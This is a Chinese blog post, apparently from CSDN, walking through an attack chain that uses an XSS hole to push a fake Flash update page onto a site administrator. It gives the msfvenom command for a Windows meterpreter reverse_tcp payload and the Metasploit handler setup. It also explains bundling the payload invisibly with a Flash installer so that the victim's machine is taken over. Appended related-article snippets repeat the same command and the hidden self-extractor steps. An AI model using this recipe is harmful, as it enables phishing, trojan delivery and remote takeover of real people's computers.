xss flash钓鱼拿到主机控制权

最新推荐文章于 2024-07-23 20:49:03 发布
最新推荐文章于 2024-07-23 20:49:03 发布
阅读量112 收藏 1
点赞数 6
文章标签: xss 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_70836100/article/details/140645871
版权
  1. 先去注册账号xssaq.com
  2. 注册成功后,点击公共模块
  3. 将其中的代码重新放在1.js中,并修改下方标红。将他放在根目录下。

4.生成钓鱼网站,以flash为例。下载下面的项目并将其源码文件部署在网站根目录

https://github.com/crow821/crowsec/tree/master/crowsec FakeFlash

  1. 打开kali,用MSF生成Payload

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=44 44 -f exe > shell.exe

  1. 开启监听

msfconsole

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set lhost 192.168.1.7 set lport 4444

run

6.将shell.exe和falsh安装包压缩成一个

         

           

6.去找一个xss漏洞提交1.js,这样管理员登录就会出问题

7.模拟登录管理员账户后会有以下页面

8.当他点击就会跳转到我的flash,这时候他点击立即下载就会上当

9.当他运行该文件就会出错

因为木马文件之前选择的是隐藏并且第一个,所以我们的木马会在这个安装界面之前

10.去kali:sysinfo

诶嘿੭ ᐕ)੭*⁾⁾
关注
  • 6
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[网络安全自学篇] 八十三.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结
杨秀璋的专栏
06-09 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF隐写和逆向题目,包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。这篇文章将详细讲解一道CSS注入题目,包括CSS注入、越权、csrf-token窃取及CSP绕过,同时总结XSS绕过知识,希望对您有所帮助。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 5394
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
xss flash钓鱼拿到主机控制权 教程
weixin_57682301的博客
07-23 164
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.7(改成自己虚拟机IP) LPORT=4444 -f exe > shell.exe。将两个⽂件⼀块压缩并更改⽂件名为"Download.exe"并且将压缩包命名为download.exe。标签卡点高级进入自解压选项将解压路径设置为--C:\Windows\Temp并且做如下设置。首先来到xss平台 点击公共模块---flash弹窗钓⻥-查看。生成shell.exe的文件。
xss平台获取管理员cookie xss flash钓鱼拿到主机控制权
weixin_71053667的博客
07-23 281
点击"设置"--"解压后运行"如下两行内容...并在"模式"标签下设置"全部隐藏" 配置更新方式----解压并更新文件而覆盖方式----覆盖所有文件。5.将两个文件一块压缩并更改文件名为"flashcenter_pp_ax_install_cn.exe",点击"高级"标签页下的"自解压选项"填。3.来到xss平台 点击公共模块---flash弹窗钓鱼-查看 将其中的代码保存成一个js文件放到我们网站的根目录下面。4.模拟管理员登录后台的操作 登录完成后触发我们插入的恶意代码。# Flash官网下载。
xss漏洞->flash钓鱼网站->拿到主机控制权
最新发布
qq_68186313的博客
07-23 249
xss漏洞->flash钓鱼网站->拿到主机控制权
渗透测试 ( 0 ) --- XSS、CSRF、文件上传、文件包含、反序列化漏洞
freeking101的博客
06-12 3713
渗透测试 --- http协议、XSS、CSRF、文件上传、文件包含、反序列化漏洞
钓鱼Pishing小结
aloneBUThappy的博客
08-16 2144
最近学习xss,对于xss钓鱼的理解不是很深入,所以学习了几篇钓鱼有关的文章,这里算是自己的总结以加深自己的印象,参考了不少的文章,在此感谢前辈们的探索和指教! DNS欺骗钓鱼 定义 DNS欺骗就是攻击者冒充域名服务器的一种欺骗行为。 ——百度百科 原理 如果可以冒充域名服务器,然后把查询的IP地址设为攻击者的IP地址,这样的话,用户上网就只能看到攻击者的主页,而不是用户想要取得的网站的主页了,这就是DNS欺骗的基本原理。DNS欺骗其实并不是真的“黑掉”了对方的网站,而是冒名顶替、招摇撞骗罢了。 .
[转]信息安全相关理论题(四)
热门推荐
Herry_Lee的专栏
02-18 3万+
26、____表示邮件服务器返回代码为临时性失败(xx代表任意数)。 A、 2xx B、 3xx C、 4xx D、 5xx 您的答案: 标准答案: C 27、买家称购买商品异常后的正确操作是立即咨询官方客服。 A、 正确 B、 错误 您的答案: 标准答案: A 28、网上陌生人给你发送补丁文件正确的操作是不下载文件。 A、 错误 B、 正确 您的答...
Kali Linux-BeEF浏览器渗透框架
道阻且长,行则将至。
12-26 4658
前言 严正声明:本文仅限于技术讨论与分享,严禁用于非法途径。 本文目的 演示如何借助 Kali Linux 系统内置的 BeEF 渗透框架,通过一段编制好的JS代码控制目标主机 Win 7 虚拟机的浏览器,进而进行社会工程学攻击(发送钓鱼网页盗窃账户密码、恶意程序发送等)和其他攻击,同时演示借助 Win 7上搭建的DVWA靶场的存储型XSS漏洞自动触发JS攻击脚本(获取Cookie)。 环境说明 ...
xss、脏牛提权.zip
06-18
XSS与脏牛提权:深度解析与实践》 XSS(Cross-site scripting)攻击是一种常见的网络安全问题,它利用了网站对用户输入数据的信任,将恶意脚本注入到网页中,进而对用户进行攻击。在给定的“xss注入闯关小游戏”...
Flash XSS漏洞挖掘1
08-03
Flash XSS漏洞挖掘1】 Flash XSS(跨站脚本)漏洞是网络安全领域中一个重要的问题,尤其是在企业级的Bug Bounty活动中。尽管这个概念并不新鲜,早在2002年就已经有相关的技术出现,但近期在Apple、Amazon、Adobe...
关于pdf文件xss攻击问题,配置xssFilter方法
12-21
3. 自定义XSSFilter:如果需要更细粒度的控制,可以创建自定义的XSSFilter类,重写`doFilter`方法,进行特定的XSS清理逻辑。这通常包括对请求参数、响应内容的清洗,去除或转义可能引发XSS的特殊字符。 4. 配置过滤...
免费蓝莲花Bluelotus,XSS工具网安
08-14
【免费】蓝莲花Bluelotus,XSS工具【网安】【免费】蓝莲花Bluelotus,XSS工具【网安】【免费】蓝莲花Bluelotus,XSS工具【网安】【免费】蓝莲花Bluelotus,XSS工具【网安】【免费】蓝莲花Bluelotus,XSS工具【网安】...
xss_javaxss_XSS_
10-04
在网络安全领域,XSS(Cross-Site ...通过对用户输入进行严格的控制和处理,我们可以大大降低XSS攻击的风险,保护应用程序和用户的隐私安全。在实际开发中,应该结合具体的项目需求和安全框架,选择最适合的防护手段。
记一次因敏感信息泄露而导致的越权+存储型XSS
2301_80127209的博客
07-23 308
可能各位师傅会有苦于不知道如何寻找测试目标的烦恼,这里我惯用的就是寻找可进站的思路。这个思路分为两种,一是弱口令进站测试,二是可注册进站测试。依照这个思路,我依旧是用鹰图进行了一波资产的搜集。
CSRF+XSS组合攻击实战
记录学习
07-19 1337
xss和csrf组合攻击漏洞复现
DVWA靶场超(详细教程)--跨站攻击(XSS+CSRF)
weixin_60838266的博客
07-19 1126
webanquan”去掉了(替换为空),我们的输入从alert变成了alert()
Vue使用FullCalendar实现日历/周历/月历
_小郑有点困了的博客
07-23 175
需求背景:项目上遇到新需求,要求实现工单以日/周/月历形式展示。而且要求不同工单根据状态显示不同颜色,一个工单内部,需要以不同颜色显示三个阶段。
XSS高级实战:从基础到深度利用
XSS攻击的防范关键在于对用户输入数据的严格控制和适当的输出编码。开发人员应遵循“不要信任任何输入”的原则,对所有用户提供的数据进行安全处理。同时,教育用户使用安全浏览器并保持其更新,也能增加对XSS攻击的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值